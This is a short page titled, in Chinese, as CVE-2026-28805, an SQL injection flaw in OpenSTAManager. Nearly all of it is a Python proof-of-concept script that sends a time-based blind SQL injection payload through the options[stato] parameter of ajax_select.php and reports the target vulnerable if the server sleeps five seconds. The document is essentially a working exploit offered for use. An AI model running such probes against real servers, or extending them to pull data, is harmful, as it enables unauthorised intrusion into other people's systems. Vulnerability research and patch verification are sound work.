CVE-2026-28805 OpenSTAManager SQL注入漏洞

import requests import time # Target URL (example) target_url = "http://target-openstamanager/ajax_select.php" # The vulnerable parameter is options[stato] # Payload to check time-based blind SQL injection # If the database sleeps for 5 seconds, the condition is True payload = "1' AND (SELECT SLEEP(5))-- -" params = { "options[stato]": payload } try: print(f"[+] Sending payload to {target_url}...") start_time = time.time() response = requests.get(target_url, params=params, timeout=10) end_time = time.time() elapsed = end_time - start_time if elapsed >= 5: print(f"[!] Vulnerability Confirmed! Response time: {elapsed:.2f}s") else: print(f"[-] Not vulnerable or patch applied. Response time: {elapsed:.2f}s") except requests.exceptions.RequestException as e: print(f"[Error] Request failed: {e}")